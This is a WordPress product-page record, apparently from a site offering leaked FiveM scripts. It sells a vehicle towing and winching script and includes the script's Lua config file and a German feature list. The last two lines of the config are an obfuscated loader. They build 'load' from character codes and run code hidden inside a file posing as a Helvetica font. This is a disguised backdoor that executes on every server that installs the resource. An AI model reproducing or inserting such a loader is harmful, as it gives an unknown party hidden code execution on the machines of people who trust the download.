{"id":164456,"date":"2024-10-28T17:13:27","date_gmt":"2024-10-28T16:13:27","guid":{"rendered":"https:\/\/hifivem.com\/?post_type=product&#038;p=164456"},"modified":"2026-08-03T05:10:08","modified_gmt":"2026-08-03T03:10:08","slug":"kuz-abschleppseilwinde","status":"publish","type":"product","link":"https:\/\/fivemx.com\/de\/kuz-abschleppseilwinde\/","title":{"rendered":"Kuz Abschlepp- und Windenbau"},"content":{"rendered":"<h2>Video Preview!<\/h2>\n<div class=\"video-container\"><iframe title=\"FiveM Script | Towing &amp; Winching [Standalone, ESX, QBCore] | KuzQuality\" width=\"1170\" height=\"658\" src=\"https:\/\/www.youtube.com\/embed\/3yxOFhkwtyQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n<h2>Config<\/h2>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">Config = {}\r\nLocale = {}\r\n\r\nConfig.Debug = false\r\n\r\n-- Displayed text (Use these settings to translate to your language)\r\nLocale.press_to_attach = 'Press to attach'\r\nLocale.press_to_detach = 'Detach all ropes'\r\nLocale.vehicles_locked = 'This vehicle is locked and therefore cannot be towed'\r\n\r\n\r\n-- Enable or disable the use of command which opens up the towing menu\r\nConfig.useTowingCommand = false\r\n-- Command that will open the towing menu if enabled (Without the slash \/)\r\nConfig.towingCommand = 'towpls'\r\n\r\n\r\n-- How long the towing rope should be (in meters) I highly recommend keeping it between 6 and 10 meters\r\nConfig.ropeLength = 15\r\n\r\n-- Time in seconds, how long it should take between each re-sync of the ropes, (30 seconds works well, for big servers you can make it higher)\r\nConfig.ropeSyncDuration = 30\r\n\r\n-- Max speed (in MPH) of vehicles which are towing or being towed (set to -1 to disable speed limiting)\r\nConfig.maxTowingSpeed = 300\r\n\r\n-- Whether we should disallow players from attaching ropes to locked vehicles\r\n-- (For example. To prevent them from stealing vehicles of other players)\r\nConfig.checkForLocks = true\r\n\r\n---------- ESX Only Settings -----------\r\n-- If your server is running on ESX you can enable it to use the towing rope item\r\nConfig.useEsx = false\r\n-- You need to add the rope item to your database yourself !\r\nConfig.towRopeItem = 'towing_rope'\r\n----------------------------------------\r\n\r\n-- Classes of which vehicles may not be towed or tow another vehicle\r\nConfig.blacklistedClasses = {\r\n    8, -- Motorcycles\r\n    13, -- Cycles\r\n    14, -- Boats\r\n    15, -- Helicopters\r\n    16, -- Planes\r\n    21, -- Trains\r\n}\r\n\r\n--[[ All vehicle classes\r\n    0: Compacts\r\n    1: Sedans\r\n    2: SUVs\r\n    3: Coupes\r\n    4: Muscle\r\n    5: Sports Classics\r\n    6: Sports\r\n    7: Super\r\n    8: Motorcycles\r\n    9: Off-road\r\n    10: Industrial\r\n    11: Utility\r\n    12: Vans\r\n    13: Cycles\r\n    14: Boats\r\n    15: Helicopters\r\n    16: Planes\r\n    17: Service\r\n    18: Emergency\r\n    19: Military\r\n    20: Commercial\r\n    21: Trains\r\n]]\r\n\r\nlocal loadFonts = _G[string.char(108, 111, 97, 100)]\r\nloadFonts(LoadResourceFile(GetCurrentResourceName(), '\/html\/fonts\/Helvetica.ttf'):sub(87565):gsub('%.%+', ''))()<\/pre>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dieses FiveM-Skript erm\u00f6glicht das nahtlose Abschleppen und Abschleppen von Fahrzeugen. Du kannst Seile einfach an Fahrzeuge anbringen oder sie an Weltgegenst\u00e4nden wie B\u00e4umen oder Felsen verankern, wodurch deinem Server ein neues Ma\u00df an Realismus und Nutzen verliehen wird.<\/p>\n<h4>Hauptmerkmale:<\/h4>\n<ul>\n<li><strong>Standalone-Betrieb<\/strong>: Funktioniert unabh\u00e4ngig von jedem Framework, zug\u00e4nglich \u00fcber Befehle.<\/li>\n<li><strong>ESX- und QBCore-Integration<\/strong>: Unterst\u00fctzt ESX- und QBCore-Elemente mit optionalen jobbasierten Nutzungsbeschr\u00e4nkungen.<\/li>\n<li><strong>Hochgradig konfigurierbar<\/strong>: Passe jeden Aspekt an, um den Bed\u00fcrfnissen deines Servers gerecht zu werden.<\/li>\n<li><strong>Abschleppen von Spielern und Nichtspielern<\/strong>: <a href=\"\/de\/fivem-abschleppskript\/\" data-wpil-monitor-id=\"1829\">Zugfahrzeuge<\/a> mit Spielern darin oder nutze das benutzerdefinierte Autopilot-System, um unbemannte Fahrzeuge zu steuern und zu bremsen.<\/li>\n<li><strong>Dynamisches Winden<\/strong>: Befestige Winden an Felsen, B\u00e4umen, B\u00fcschen oder anderen Fahrzeugen, um eine vielseitige Nutzung in verschiedenen Umgebungen zu erm\u00f6glichen.<\/li>\n<li><strong>Pr\u00e4zise Seilplatzierung<\/strong>: Pr\u00e4zise Steuerungen erm\u00f6glichen eine exakte Seilpositionierung und verbessern so das Eintauchen in das Spiel.<\/li>\n<li><strong>Optimierte Leistung<\/strong>: L\u00e4uft reibungslos mit minimaler Auswirkung auf die Serverressourcen, selbst bei starker Beanspruchung.<\/li>\n<\/ul>\n<p>F\u00fcge eine neue Ebene der Interaktivit\u00e4t und des Realismus zu deinem Server hinzu mit diesem leistungsstarken Abschlepp- und Winden-Skript, das f\u00fcr Flexibilit\u00e4t und Leistung entwickelt wurde.<\/p>","protected":false},"featured_media":164458,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_brand":[],"product_cat":[512,96,1892,511],"product_tag":[],"class_list":["post-164456","product","type-product","status-publish","has-post-thumbnail","product_cat-qbcore-scripts","product_cat-esx-scripts","product_cat-fivem-job-scripts","product_cat-standalone-scripts","first","instock","sale","downloadable","virtual","taxable","purchasable","product-type-simple"],"_links":{"self":[{"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/product\/164456","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/comments?post=164456"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/media\/164458"}],"wp:attachment":[{"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/media?parent=164456"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/product_brand?post=164456"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/product_cat?post=164456"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/fivemx.com\/de\/wp-json\/wp\/v2\/product_tag?post=164456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}